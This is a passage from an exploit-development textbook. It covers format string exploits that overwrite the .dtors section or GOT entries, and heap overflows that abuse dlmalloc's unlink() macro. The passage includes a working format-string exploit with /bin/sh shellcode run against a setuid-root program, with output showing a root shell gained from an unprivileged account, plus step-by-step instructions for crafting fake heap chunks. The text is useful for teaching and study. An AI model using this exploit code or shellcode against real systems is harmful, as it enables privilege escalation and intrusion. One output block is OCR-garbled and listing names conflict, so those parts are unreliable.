    fprintf(stderr, "byte4+2: %#x (%c)\n", byte4 + 2, byte4 + 2);
    fprintf(stderr, "value: %d (%#lx)\n", (int) value, value);
    fprintf(stderr, "high: %lu (%#lx)\n", high, high);
    fprintf(stderr, "low: %lu (%#lx)\n", low, low);
    fprintf(stderr, "pos: %d\n", pos);

    if (!(buf = malloc(length))) {
        perror("allocate buffer failed");
        exit(EXIT_FAILURE);
    }
    memset(buf, 0, length);   /* the whole buffer, not sizeof(buf) */

    /* Both variants place addr + 2 first and addr second (little-endian);
       the smaller half is always written first, because the count only grows. */
    if (high < low) {
        snprintf(buf, length,
                 "%c%c%c%c"          /* addr + 2: receives high */
                 "%c%c%c%c"          /* addr: receives low */
                 "%%.%lux"           /* pad up to high */
                 "%%%d$hn"           /* write high to addr + 2 */
                 "%%.%lux"           /* pad from high up to low */
                 "%%%d$hn",          /* write low to addr */
                 byte4 + 2, byte3, byte2, byte1,
                 byte4, byte3, byte2, byte1,
                 high - 8, pos,
                 low - high, pos + 1);
    } else {
        snprintf(buf, length,
                 "%c%c%c%c"          /* addr + 2: receives high */
                 "%c%c%c%c"          /* addr: receives low */
                 "%%.%lux"           /* pad up to low */
                 "%%%d$hn"           /* write low to addr */
                 "%%.%lux"           /* pad from low up to high */
                 "%%%d$hn",          /* write high to addr + 2 */
                 byte4 + 2, byte3, byte2, byte1,
                 byte4, byte3, byte2, byte1,
                 low - 8, pos + 1,
                 high - low, pos);
    }

    return buf;
}

int main(int argc, char *argv[])
{
    char *buf;

    if (argc != 4) {
        printf("Usage: %s <address> <value> <position>\n", argv[0]);
        exit(0);
    }

    buf = frmstr_builder(strtoul(argv[1], NULL, 16),
                         strtoul(argv[2], NULL, 16),
                         atoi(argv[3]));

    fprintf(stderr, "buf: [%s] (%d)\n\n", buf, (int) strlen(buf));
    printf("%s", buf);

    return 0;
}





In buffer-overflow exploits, the function return address on the stack is overwritten to pass control to the shellcode. The location to overwrite has to be guessed, because the exact position of the return address on the stack cannot be determined in advance. The format string vulnerability allows you to write to practically any address in memory. Therefore, in format string exploits, you are not limited to the return address. It is more convenient to overwrite addresses that stay constant in a vulnerable program. Such addresses can be easily determined with the help of the .dtors section and the global offset table.


13.3.7. Constructor and Destructor Sections 


Each C program compiled with GCC contains special sections named .ctors and .dtors.

The .ctors section is called the constructor section and stores pointers to the functions executed before the main() function is entered.

The .dtors section is called the destructor section and stores pointers to the functions executed after the main() function exits.
By default, both sections are empty; that is, they contain no function pointers. GCC offers special attributes, constructor and destructor, that allow programmers to declare functions as constructors or destructors. In a program, these attributes are set as follows:

static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));


Listing 13.30 shows the source code for a simple program demonstrating how these 
attributes work. 





Listing 13.30. Using the constructor and destructor sections (cd_dtors.c) 








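#include <stdio.h>

static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));

int main()
{
    printf("This is main()\n");
    return 0;
}

/* Called before main() via the .ctors section */
void start(void)
{
    printf("This is start()\n");
}

/* Called after main() returns via the .dtors section */
void stop(void)
{
    printf("This is stop()\n");
}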





Compile, execute, and view the results: 

# gcc cd_dtors.c -o cd_dtors
# ./cd_dtors
This is start()
This is main()
This is stop()

The .dtors and .ctors sections have the same layout: each is just a list of 32-bit addresses that starts with 0xffffffff and ends with 0x00000000.
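The layout can be modeled with an ordinary array. The sketch below (count_list_entries() is a hypothetical helper that only imitates the layout and is not GCC's startup code) skips the leading 0xffffffff marker and counts addresses until the 0x00000000 terminator; the list of an empty section has zero entries.

```c
#include <stddef.h>
#include <stdint.h>

/* Counts the function addresses in a .ctors/.dtors-style list: a leading
   0xffffffff marker, the addresses, then a 0x00000000 terminator. */
size_t count_list_entries(const uint32_t *list)
{
    size_t count = 0;

    if (list[0] != 0xffffffffu)
        return 0;                       /* not a list in this layout */
    for (size_t i = 1; list[i] != 0; i++)
        count++;                        /* every non-zero word is an address */
    return count;
}
```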

The contents of the sections can be viewed using the objdump utility:

# objdump -s -j .ctors ./cd_dtors

./cd_dtors:     file format elf32-i386

Contents of section .ctors:
 8049560 ffffffff 80840408 00000000           ............

# objdump -s -j .dtors ./cd_dtors

./cd_dtors:     file format elf32-i386

Contents of section .dtors:
 804956c ffffffff 98840408 00000000           ............
The format in which the objdump utility presents the sections' contents is somewhat confusing. The first value in each output line (0x8049560 for .ctors and 0x804956c for .dtors) is just the address of the section's location in memory. It is followed by the actual contents of the section, shown byte by byte in memory order. Because x86 is little-endian, the bytes of each group must be read in reverse to obtain an address; that is, the group shown as 98840408 in the .dtors section is actually the address 0x08048498.
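Reading such a dump by hand is error-prone, so here is a sketch of the conversion (word_from_dump() is a hypothetical helper): it takes one 8-digit group as printed by objdump -s, treats each pair of digits as a byte at increasing addresses, and assembles the little-endian 32-bit value.

```c
#include <stdint.h>

/* Converts an 8-digit group from objdump -s output (bytes in memory order)
   into the 32-bit little-endian value it represents, e.g. "98840408" to
   0x08048498. Returns 0 if any character is not a hex digit. */
uint32_t word_from_dump(const char *hex8)
{
    uint32_t value = 0;

    for (int i = 0; i < 4; i++) {
        unsigned byte = 0;
        for (int j = 0; j < 2; j++) {
            char c = hex8[2 * i + j];
            unsigned digit;

            if (c >= '0' && c <= '9')
                digit = (unsigned) (c - '0');
            else if (c >= 'a' && c <= 'f')
                digit = (unsigned) (c - 'a' + 10);
            else if (c >= 'A' && c <= 'F')
                digit = (unsigned) (c - 'A' + 10);
            else
                return 0;                       /* also stops at a short string */
            byte = byte * 16 + digit;
        }
        value |= (uint32_t) byte << (8 * i);    /* byte i is at address + i */
    }
    return value;
}
```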

The most important feature of the .ctors and .dtors sections is that they are writable. This means that you can overwrite one of the addresses in a section with a shellcode address, and control will be passed to that address when the corresponding functions are called. However, only the .dtors section is suitable for this purpose, because the .ctors entries are executed before main() starts, so the exploit has no chance to change them in time.

It does not matter that in ordinary programs the constructor and destructor sections are empty, because you can overwrite the terminating address, 0x00000000, with your shellcode address, and execution control will be passed to that address.

Thus, all you have to do is overwrite the address located 4 bytes after the start of the .dtors section. The first 4 bytes must be skipped to avoid overwriting the section's first value, 0xffffffff; otherwise, the exploit will not work.


13.3.8. Procedure Linkage and Global Offset Tables 


In addition to the .ctors and .dtors sections, each dynamically linked ELF file contains two interlinked sections, .plt and .got, which are used for calling shared library functions. The .plt section is called the procedure linkage table (PLT); it contains small stubs, each of which jumps through an entry in the .got section. Thus, the .plt section is just an intermediary used to call shared functions; it does not store their addresses. The addresses of the shared functions are stored in the .got section, called the global offset table (GOT).
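The indirection can be pictured with a plain C analogy. In the sketch below, which is only a model and not how the dynamic linker is actually implemented, got_slot stands in for a writable GOT entry and plt_call() for a PLT stub that always calls through it (all names are hypothetical). Because every call goes through the slot, changing the slot changes what every later call executes.

```c
/* A model of PLT/GOT indirection using an ordinary function pointer. */
typedef int (*func_t)(int);

int twice(int x)  { return 2 * x; }
int negate(int x) { return -x; }

func_t got_slot = twice;          /* plays the role of a .got entry */

int plt_call(int x)               /* plays the role of a .plt stub */
{
    return got_slot(x);           /* always calls through the slot */
}

void set_got_slot(func_t f)
{
    got_slot = f;                 /* redirects all later plt_call() calls */
}
```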

The .plt section is read-only, so it is of no interest to us; the .got section, however, can be written to. This makes it possible to replace the address of one of the functions in the GOT with the address of your shellcode, thus passing control to the shellcode when the program calls that function.

The objdump utility run with the -R flag outputs the addresses of the shared functions in 
GOT, along with the functions’ names, which makes it possible to determine the best function 
address to rewrite: 

# objdump -R ./format

./format:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049624 R_386_GLOB_DAT    __gmon_start__
0804960c R_386_JUMP_SLOT   __register_frame_info
08049610 R_386_JUMP_SLOT   __deregister_frame_info
08049614 R_386_JUMP_SLOT   __libc_start_main
08049618 R_386_JUMP_SLOT   printf
0804961c R_386_JUMP_SLOT   __cxa_finalize
08049620 R_386_JUMP_SLOT   snprintf


For example, the GOT entry of the printf() function in the vulnerable format program (0x08049618) can be overwritten.
13.3.9. Format String Exploit


Listing 13.31 shows the source code for a .dtors section format-string exploit. The shellcode 
is passed to the vulnerable application using an environment variable. The offset (in words) 
from the start of the vulnerable buffer and the address, at which the value is to be written, are 
hard-coded in the exploit. I used an address from the .dtors section, so it is necessary to add 
4 to it (see Section 13.3.7). If an address from GOT is used, 4 does not have to be added to it. 

The contents of the fmt_str_creator() function are not shown in Listing 13.31 because 
they are the same as the contents of the frmstr_builder() function in Listing 13.29. 





Listing 13.31. A .dtors section format string exploit (expl_bss.c) 








#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char buf[100];

char shellcode[] =
    "\x31\xc0"          /* xorl %eax, %eax     */
    "\x31\xdb"          /* xorl %ebx, %ebx     */
    "\xb0\x17"          /* movb $0x17, %al     */
    "\xcd\x80"          /* int $0x80           */
    "\x31\xc0"          /* xorl %eax, %eax     */
    "\x31\xdb"          /* xorl %ebx, %ebx     */
    "\xb0\x2e"          /* movb $0x2e, %al     */
    "\xcd\x80"          /* int $0x80           */
    "\x31\xc0"          /* xorl %eax, %eax     */
    "\x50"              /* pushl %eax          */
    "\x68""//sh"        /* pushl $0x68732f2f   */
    "\x68""/bin"        /* pushl $0x6e69622f   */
    "\x89\xe3"          /* movl %esp, %ebx     */
    "\x50"              /* pushl %eax          */
    "\x53"              /* pushl %ebx          */
    "\x89\xe1"          /* movl %esp, %ecx     */
    "\x99"              /* cltd                */
    "\xb0\x0b"          /* movb $0xb, %al      */
    "\xcd\x80";         /* int $0x80           */

char *fmt_str_creator(long addr, long value, int pos)
{
    /* Body identical to frmstr_builder() in Listing 13.29 (not repeated here) */
    return buf;
}

int main()
{
    char *env[] = {shellcode, NULL};
    char buff[100];
    long RET;
    long ADDRESS = 0x080495e8 + 4;   /* start of .dtors + 4 */
    int ALIGN = 6;                   /* N$ position of the buffer start */

    /* The shellcode is the only environment string, just below 0xc0000000 */
    RET = 0xc0000000 - strlen(shellcode) - strlen("./format") - 6;
    sprintf(buff, "%s", fmt_str_creator(ADDRESS, RET, ALIGN));

    execle("./format", "format", buff, NULL, env);
    return 0;
}


Compile, run, and check out the results: 


# gcc format.c -o format 
# chmod ug+s ./format 
# ls -la ./ format 


-rwSr-sr-x l root root 13913 Apr 29 19:29 ./format 
# objdump -s -j .dtors ./format 
./format: file format elf32-1386 


Contents of section .dtors: 

B0495fe8 f£fffffftf OOOdo000 ee et 
# gcc expl_frm.c -o expl_frm 

# su nobody 

sh-2.045 id 

vid=99 (nobody) gid=99 (nobody) qroups=99 (nobody) 
sh-2.045 ./expl_frmm 

# ./format °./frmbuilder bEtf{ft9ic 8048360 6° 
addr: Oxb0495ac 

bytel: 0x8 | 

byte : Ox4d () 

byte3: 0x95 (*} 

byted: Oxfe (3) 

byted+2: Oxfe (4) 


value: -LO73741878 (Oxbftffftca) 
high: 49151 (Oxbfff) 

low: 65482 (Oxffca) 

pos: 6 


a=] (Oxbftiteéc) 
bel (Oxbititidec) 


but: 
fYSs0000000000000000000000000000000000000000000000000000000000000000000000000000000000 
H0000000) 


a=1 (0xbffffebc)
b=134513504 (Oxbfitfidec)

sh-2.04# id
uid=0(root) gid=0(root) groups=99(nobody)
sh-2.04#


The source codes for all programs in this section can be found in the /PART III/ 
Chapter 13/13.3 directory on the accompanying CD-ROM. 
13.4. Heap Overflow


The author of the technique for developing exploits based on a heap-overflow error is a
Russian hacker using the nickname Solar Designer. On July 25, 2000, he published an advisory
in Bugtraq about a heap-buffer overflow error that he had discovered in the Netscape browser,
together with an exploit based on this error. Information about the vulnerability and the
exploit can be found at the SecurityFocus site (http://www.securityfocus.com/bid/1503)
and at the Solar Designer site (http://www.openwall.com/advisories/OW-002-netscape-jpeg/).

To be fair, in January 1999, a member of the w00w00 hacker team, Matt Conover,
published an article on heap-buffer overflows (http://www.w00w00.org/files/
articles/heaptut.txt). But Conover only described primitive techniques, similar to those for
overwriting function pointers considered in Section 13.2 of this chapter. Solar Designer
discovered a better technique that uses the allocator's internal memory management structures
to overwrite arbitrary memory areas with the necessary data. His technique is now used in all
serious exploits based on heap buffer overflows. This section covers its details.


13.4.1. Standard Heap Functions 


There are four standard C library functions for dynamically allocating and freeing memory in
the heap. Their prototypes and descriptions, based on the man pages, are as follows.


□ The void *malloc(size_t size); function allocates size bytes of memory and returns
a pointer to it, or NULL if the memory cannot be allocated. The allocated memory is
not initialized.

□ The void *calloc(size_t nmemb, size_t size); function allocates memory for an array of
nmemb elements of size bytes each and returns a pointer to the allocated memory, or NULL if
the memory cannot be allocated. The allocated memory is zeroed out.

□ The void *realloc(void *ptr, size_t size); function changes the size of the memory block
pointed to by ptr to size bytes (growing or shrinking it, depending on whether size is larger
or smaller than the current size) and returns a pointer to the resized block. The contents
are preserved up to the smaller of the old and new sizes; the added memory is not initialized.
If ptr is NULL, the call is equivalent to malloc(size); if size is 0, the call is equivalent
to free(ptr). Unless ptr is NULL, it must point to memory previously allocated by malloc(),
calloc(), or realloc(). Growing a block may cause it to be moved to another location in
virtual memory where enough contiguous free space is available. If the request fails,
realloc() returns NULL and the original block is left untouched: it is neither freed nor moved.

□ The void free(void *ptr); function frees the memory area previously allocated by
malloc(), calloc(), or realloc(). The pointer to the memory area is passed in the ptr
argument. If ptr is NULL, no operation is performed.
13.4.2. Vulnerability Example


Consider a simple example of a vulnerable program (Listing 13.32). 





Listing 13.32. A vulnerable program (heap_vuln.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int main(int argc, char *argv[])
{
    char *a;
    char *b;

    a = malloc(200);
    b = malloc(64);

    printf("a = %p, b = %p, b - a = %d\n\n", a, b, (int)(b - a));
    strcpy(a, argv[1]);    /* no length check: this is the bug */

    printf("a = %s (%d)\n", a, (int)strlen(a));
    printf("b = %s (%d)\n", b, (int)strlen(b));

    free(a);
    free(b);

    return 0;
}

Compile the program, run it, and observe the results:

# gcc heap_vuln.c -o heap_vuln
# ./heap_vuln `perl -e 'print "A"x210'`
a = 0x80497b8, b = 0x8049888, b - a = 208

a = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAA (210)
b = AA (2)
Segmentation fault (core dumped)

The program declares two buffers in the heap; the first is 200 bytes and the other is
64 bytes. Because the strcpy() function does not check the size of the destination buffer,
a string of any length can be written to the first buffer.
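For comparison, here is a minimal sketch of a bounds-checked copy that could replace the strcpy() call in Listing 13.32, for example as copy_bounded(a, 200, argv[1]). The name copy_bounded() is hypothetical; the helper truncates instead of overflowing and reports whether truncation happened:

```c
#include <string.h>

/* Hypothetical helper: copy src into dst, a buffer of dstsize bytes, never
   writing past its end. Returns 1 if the whole string fit, 0 if it was
   truncated (or dstsize is 0). dst is NUL-terminated whenever dstsize > 0. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t len = strlen(src);

    if (dstsize == 0)
        return 0;
    if (len >= dstsize) {
        memcpy(dst, src, dstsize - 1);   /* copy only what fits ... */
        dst[dstsize - 1] = '\0';         /* ... and terminate */
        return 0;
    }
    memcpy(dst, src, len + 1);           /* includes the terminating NUL */
    return 1;
}
```

With this change, the 210-character argument is cut to 199 characters plus the terminator, and buffer b keeps its contents.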

As an example, a string of 210 A characters is passed to the vulnerable program from the
command line. As a result, the first buffer overflows and the program terminates abnormally.
But there is a peculiarity here that was absent in the stack and BSS buffer overflows
(Sections 13.1 and 13.2, respectively). When the program crashes, the first buffer holds all
210 bytes, but only 2 bytes (two A characters) end up in the second buffer. The program also
shows the buffers' addresses in the heap and the difference between them, which is 208 bytes
rather than 200. This suggests that 8 bytes of additional, invisible memory lie between the
two buffers, and this is indeed the case. The malloc() function always allocates more memory
than requested; even for malloc(0), it allocates at least 8 bytes. Heap memory is allocated
and freed according to a rather complex algorithm, and in addition to the buffers themselves,
the heap stores service information needed to manage them. The exploit technique developed
by Solar Designer is based on overwriting this service information.
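The hidden overhead can be observed directly on a glibc system. The sketch below assumes glibc (or another C library that provides the malloc_usable_size() extension declared in <malloc.h>); the helper usable_for_request() is hypothetical. It reports how many bytes the allocator actually made available for a request, which on glibc is typically somewhat more than was asked for. The exact figures differ between 32-bit and 64-bit systems and between allocator versions:

```c
#include <malloc.h>   /* malloc_usable_size(): a glibc extension, not ISO C */
#include <stdlib.h>

/* Hypothetical helper: allocate n bytes, ask the allocator how many bytes
   are really usable in the returned block, free it, and return that number
   (0 if the allocation failed). */
size_t usable_for_request(size_t n)
{
    void *p = malloc(n);
    size_t usable;

    if (p == NULL)
        return 0;
    usable = malloc_usable_size(p);
    free(p);
    return usable;
}
```

Printing usable_for_request(200) and usable_for_request(0) on a test machine shows the rounding and the minimum chunk size at work.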


13.4.3. The Doug Lea Algorithm 


The GNU C library used on Linux manages the heap with an allocator based on the algorithm
developed by Doug Lea, unofficially called dlmalloc. All the standard functions for dynamically
allocating and freeing heap memory, malloc(), calloc(), realloc(), and free(), are based on
the dlmalloc algorithm. The commented source code of the algorithm can be found on Doug Lea's
Internet page (http://gee.cs.oswego.edu/pub/misc/malloc.c). The algorithm is continuously
improved, so the information given in this section may not apply to its newer versions.

You may wonder why an algorithm to manage the heap memory is needed at all. Indeed, no
such algorithm is needed to allocate buffers in the stack and the BSS area, because stack
and BSS buffers are usually allocated once and do not change during program execution. The
heap, in contrast, is intended specifically for allocating and resizing buffers while the
program runs; that is, its memory is allocated and freed dynamically. Constant allocating and
freeing can eventually leave the heap heavily fragmented, so that no single free area is large
enough to satisfy a request even though enough free memory exists in total. To prevent this,
heap allocation and freeing must be managed by special algorithms that keep track of released
memory chunks and reuse them when necessary, and do so quickly. The dlmalloc algorithm meets
these requirements.

The general structure of the heap memory allocated using the dlmalloc algorithm
is shown in Fig. 13.6.

Altogether, three buffers are allocated in the heap shown in Fig. 13.6. Each buffer has
a mandatory service header. Doug Lea calls a buffer together with its header a chunk.
Therefore, from now on, a buffer means an allocated heap memory area without the header, and
a chunk means an allocated memory area with its header.

New chunks that cannot be carved out of previously freed memory are allocated from the
so-called wilderness, that is, from the unused heap area at higher memory addresses. The
wilderness is the initial state of the heap, and a chunk freshly carved from it borders it.

There are two types of heap chunks: unused space and user data. Unused chunks are those
freed by the free() function or left over when realloc() reduces the size of a chunk. User
data chunks are those still being used by the program. The type of a chunk determines the
format of its service header.
Fig. 13.6. An example of heap memory allocation


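The chunk header is defined by the following general structure:

struct malloc_chunk {
    INTERNAL_SIZE_T prev_size;   /* size of the previous chunk, if it is free */
    INTERNAL_SIZE_T size;        /* size of this chunk in bytes, plus flag bits */
    struct malloc_chunk *fd;     /* next free chunk (used only if this chunk is free) */
    struct malloc_chunk *bk;     /* previous free chunk (used only if this chunk is free) */
};

typedef struct malloc_chunk* mchunkptr;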

Depending on whether a chunk is unused space or user data, some fields of the structure
may go unused.

The prev_size field contains the size of the previous chunk if that chunk is free. If the
previous chunk is user data, this field is part of its data; that is, the previous chunk can
store 4 bytes of its data in this field (on 32-bit x86, prev_size is only 4 bytes long).

The size field holds the size of the current chunk in bytes. Because the value of the size
field is always a multiple of eight, its three least significant bits are always zero. The
dlmalloc algorithm uses two of these bits, the two least significant ones, as control flags:

#define PREV_INUSE 0x1

#define IS_MMAPPED 0x2
A set IS_MMAPPED bit means that the current chunk was allocated by the mmap() function.
This bit is of no interest for writing exploits; the least significant bit of the size field,
PREV_INUSE, however, is of special interest to exploit developers. If this bit is set to 1,
the previous chunk (the one adjacent to the current chunk at lower addresses) is user data.
If the bit is set to 0, the previous chunk is unused space and the prev_size field holds
its size.
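The flag handling can be sketched as follows. The helpers below are hypothetical, modeled on the idea behind dlmalloc's chunksize() and prev_inuse() macros rather than copied from them, and uint32_t stands in for the 4-byte size field of a 32-bit system. For example, on a 32-bit system the 64-byte buffer b in Listing 13.32 lives in a 72-byte chunk (0x48), and because chunk a before it is in use, b's size field reads 0x49:

```c
#include <stdint.h>

#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2
#define SIZE_BITS  (PREV_INUSE | IS_MMAPPED)

/* Real chunk size: the size field with the flag bits masked off. */
uint32_t chunk_size_of(uint32_t size_field)
{
    return size_field & ~(uint32_t)SIZE_BITS;
}

/* 1 if the chunk just below this one is user data (in use). */
int prev_chunk_in_use(uint32_t size_field)
{
    return (size_field & PREV_INUSE) != 0;
}

/* 1 if this chunk was obtained with mmap(). */
int chunk_is_mmapped(uint32_t size_field)
{
    return (size_field & IS_MMAPPED) != 0;
}
```

Because every real size is a multiple of eight, masking off the low bits never loses size information.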

The next two fields are pointers and are present only in headers of unused space
chunks. The fd field points to the next unused space chunk in the list, and the bk field
points to the previous one.

The dlmalloc algorithm registers all unused space chunks in doubly linked lists, which is
why the fd and bk pointers are needed. In fact, dlmalloc maintains multiple doubly linked
lists, each holding unused space chunks of a certain size range. Each list is anchored in a
so-called bin. A bin is nothing but a forward and a backward pointer serving as the head of
a doubly linked list. The dlmalloc algorithm supports 128 bins. The bin in which an unused
space chunk is placed depends on the chunk's size:

□ A 200-byte chunk will be registered in the bin storing chunks exactly 200 bytes in size.

□ A 1,504-byte chunk will be registered in the bin storing chunks greater than or equal
to 1,472 bytes but less than 1,536 bytes in size.

□ A 16,392-byte chunk will be registered in the bin storing chunks greater than or equal
to 16,384 bytes but less than 20,480 bytes in size.


The limits are calculated and the bins are selected according to certain algorithms, which
can be examined in the source code of dlmalloc. These algorithms are of no interest for
writing exploits.

A call of the free() function results in one of the following:

□ Calling free(0) produces no changes.

□ A freed chunk bordering the wilderness is merged with it.

□ A freed chunk bordering only user data chunks is registered in one of the bins.

□ A freed chunk bordering an unused space chunk is merged with this chunk.

In the latter case, the free() function must first take the neighboring unused chunk out of
its doubly linked list, which it does by calling the unlink() macro:

#define unlink(P, BK, FD) {  \
    FD = P->fd;              \
    BK = P->bk;              \
    FD->bk = BK;             \
    BK->fd = FD;             \
}

The macro sets the bk pointer of the chunk following P in the list (FD) to point to the
chunk preceding P (BK), and sets the fd pointer of the preceding chunk (BK) to point to the
chunk following P (FD). As a result, P drops out of the list.

After a freed chunk is merged with an unused space chunk, the new, larger chunk is registered
in one of the bins.
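The effect of unlink(), and the integrity check that later allocators added against its abuse, can be demonstrated on an ordinary toy list. In the sketch below, struct node, toy_unlink(), and toy_unlink_checked() are hypothetical names. The checked variant refuses to write when the neighbors do not point back at P, which is the kind of test glibc's malloc later adopted (it aborts with a "corrupted double-linked list" message):

```c
#include <stddef.h>

/* A toy free-list node with the same fd/bk links as malloc_chunk. */
struct node {
    struct node *fd;   /* next node in the list */
    struct node *bk;   /* previous node in the list */
};

/* Exactly what the unlink() macro does: two unchecked stores. */
void toy_unlink(struct node *p)
{
    struct node *FD = p->fd;
    struct node *BK = p->bk;
    FD->bk = BK;
    BK->fd = FD;
}

/* Same operation, but first verify that both neighbors really link back
   to p. Returns 0 on success, -1 (and writes nothing) if the links are
   inconsistent, as they are when fd/bk have been forged by an overflow. */
int toy_unlink_checked(struct node *p)
{
    struct node *FD = p->fd;
    struct node *BK = p->bk;
    if (FD->bk != p || BK->fd != p)
        return -1;
    FD->bk = BK;
    BK->fd = FD;
    return 0;
}
```

With forged links, toy_unlink() would blindly store to whatever addresses fd and bk contain, while toy_unlink_checked() detects the mismatch before any store.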
13.4.4. Constructing the Exploit


The unlink() macro is of great importance to exploit developers. Being able to overwrite the
fd and bk pointers in the header of an unused space chunk and to have unlink() called for it
allows you to write arbitrary data to an arbitrary memory location. In a chunk header, the fd
field lies 8 bytes from the start and the bk field lies 12 bytes from the start, so the two
assignments in unlink() amount to the following:

// 4 bytes for prev_size, 4 bytes for size, and 4 bytes for fd
*(P->fd + 12) = P->bk;
// 4 bytes for prev_size and 4 bytes for size
*(P->bk + 8) = P->fd;
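The offsets 8 and 12 follow directly from the field order of malloc_chunk. The sketch below models the 32-bit header with uint32_t fields (an assumption made so the offsets match the 32-bit layout even when compiled on a 64-bit machine) and computes, for given fd and bk values, the two addresses that unlink() writes to. struct chunk32 and unlink_write_targets() are hypothetical names:

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit model of the chunk header: every field is 4 bytes wide. */
struct chunk32 {
    uint32_t prev_size;   /* offset 0  */
    uint32_t size;        /* offset 4  */
    uint32_t fd;          /* offset 8  */
    uint32_t bk;          /* offset 12 */
};

/* unlink() stores BK into FD->bk and FD into BK->fd.
   Report the two addresses written for the given fd and bk values. */
void unlink_write_targets(uint32_t fd, uint32_t bk,
                          uint32_t *first_target, uint32_t *second_target)
{
    *first_target  = fd + (uint32_t)offsetof(struct chunk32, bk); /* FD->bk = BK */
    *second_target = bk + (uint32_t)offsetof(struct chunk32, fd); /* BK->fd = FD */
}
```

For fd = 0x1000 and bk = 0x2000, the first store goes to 0x100c and the second to 0x2008.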

Usually, the fd pointer is overwritten with an address derived from the GOT entry of some
function. In the vulnerable program (Listing 13.32), the unlink() macro is called by free(a),
and the only library call that follows it is free(b); consequently, the only GOT entry worth
overwriting is that of free(). Thus, fd is overwritten with the address of free() in GOT, and
bk is overwritten with the address of the shellcode. In this case, the unlink() macro looks
like the following:

FD = P->free;
BK = P->ret;
FD->(free + 12) = ret;
BK->(ret + 8) = free;

Here, free is the address of the free() function's entry in GOT and ret is the address of
the shellcode in memory. As a result, the address of the shellcode would be written at the
address free + 12. However, it needs to be written exactly at the GOT entry of free().
Therefore, fd must be replaced with the address of free() minus 12. In this case, unlink()
looks as follows:

FD = P->(free - 12);
BK = P->ret;
FD->(free - 12 + 12) = ret;
BK->(ret + 8) = free - 12;


Now the GOT entry of free() is overwritten with the shellcode's address, and the vulnerable
program will call the shellcode instead of free(b). As you can see, only the penultimate line
in unlink() performs the necessary write:

FD->(free - 12 + 12) = ret;

The last line in unlink(), however, cannot be ignored:

BK->(ret + 8) = free - 12;

It writes the value free - 12 at the location 8 bytes past the start of the shellcode. This
means that bytes 9, 10, 11, and 12 of the shellcode (offsets 8 through 11) will be damaged.
Therefore, an instruction that jumps over the first 12 bytes must be placed at the beginning
of the shellcode for it to execute successfully. The '\xeb\x0c' machine instruction jumps
12 bytes; however, because the jump is counted from the end of the instruction, which itself
takes 2 bytes, the jump must be only 10 bytes long. This jump is performed by the '\xeb\x0a'
machine instruction.
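The jump arithmetic can be checked with a few lines of C. A short x86 jmp (opcode 0xeb) is 2 bytes long, and its signed 8-bit displacement is counted from the address of the next instruction. The hypothetical helper below computes where execution resumes:

```c
/* Offset at which execution continues after a 2-byte short jmp
   (0xeb disp8) located at offset `at`. */
long short_jmp_target(long at, signed char disp)
{
    return at + 2 + disp;   /* next instruction + signed displacement */
}
```

short_jmp_target(0, 0x0a) gives 12, just past the damaged bytes at offsets 8 through 11, whereas a displacement of 0x0c would land at offset 14.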

As already mentioned, for the unlink() macro to be called, the chunk being freed must be
adjacent to an unused space chunk. Initially, both chunks in the vulnerable program are user
data chunks. Because free(b) must end up calling the shellcode, there is no choice but to make
free(a) call the unlink() macro. To this end, a dummy unused space chunk must be created right
after chunk a.

This can be achieved as shown in Fig. 13.7. When free(a) is called, it checks whether the
next chunk is unused. To do this, it uses the size field in the header of the dummy chunk to
locate the size field of the chunk after it, which is also created by the exploit's developer.
In that field, the PREV_INUSE bit must be set to 0; the function then decides that the first
dummy chunk, F1, is unused and calls the unlink(F1) macro. The result is the necessary memory
overwrites.


[Figure: the heap before and after overflowing, low addresses at the top. Before: chunk A (200 bytes of data) followed by chunk B (prev_size, size of B with PREV_INUSE=1, 64 bytes of data). After: A's 200 data bytes are followed by fake chunk F1 (prev_size = garbage, size of F1) and a second fake size field (garbage with PREV_INUSE=0).]

Fig. 13.7. Overflowing the heap with dummy chunks


This solution can be improved by getting rid of the second dummy chunk. The size field of the
dummy chunk can be made to point back at the dummy chunk's own prev_size field, which is then
treated as the size field of the next chunk. Simply set the size field to -4 (in exploits, the
hexadecimal value 0xfffffffc is often used). This works because the PREV_INUSE bit is checked
as follows:


#define inuse_bit_at_offset(p, s) \
    (((mchunkptr)(((char *)(p)) + (s)))->size & PREV_INUSE)
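The effect of the -4 size value can be sketched with 32-bit unsigned arithmetic, which wraps around just as the address calculation does on a 32-bit system. The helpers next_chunk_addr() and size_field_addr() are hypothetical, and the address in the usage note is arbitrary:

```c
#include <stdint.h>

/* Address of the chunk that follows the chunk at p, given p's size field
   (flag bits stripped). 32-bit unsigned addition wraps, so a size of
   0xfffffffc behaves like -4. */
uint32_t next_chunk_addr(uint32_t p, uint32_t size_field)
{
    return p + (size_field & ~(uint32_t)0x3);
}

/* The size field sits 4 bytes into a chunk, after prev_size. */
uint32_t size_field_addr(uint32_t chunk)
{
    return chunk + 4;
}
```

For a dummy chunk at 0x08049880 with size 0xfffffffc, next_chunk_addr() yields 0x0804987c, and size_field_addr() of that chunk yields 0x08049880 again, that is, the dummy chunk's own prev_size field.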
[Figure: the heap before and after overflowing, low addresses at the top. Before: chunk A (prev_size, size of A, 200 bytes of data) followed by chunk B (prev_size, size of B with PREV_INUSE=1, 64 bytes of data). After: A's data area holds data or shellcode, followed by a single fake chunk whose prev_size is garbage with PREV_INUSE=0.]

Fig. 13.8. Overflowing the heap with dummy chunks (the improved version)


The overflowed buffer in this case will look as shown in Fig. 13.8.

Listing 13.33 shows the source code for an exploit that places the shellcode in the vulnerable
buffer itself. Listing 13.34 shows an improved version, which places the shellcode in an
environment variable.

The address of the free() function in GOT is determined as follows:

# objdump -R ./heap_vuln | grep free
080496ec R_386_JUMP_SLOT   free

The address of the vulnerable buffer is determined using the ltrace utility:

# ltrace ./heap_vuln 2>&1 | grep 200
malloc(200) = 0x080497b8

The obtained value is the address of the buffer returned by malloc(). In Listing 13.33, the
buffer begins with two 4-byte GARBAGE words, so the value must be increased by 8 to obtain
the address of the shellcode.

Compile, run, and check the results as follows:

# gcc heap_vuln.c -o heap_vuln
# gcc expl_heap1.c -o expl_heap1
# chmod ug+s ./heap_vuln
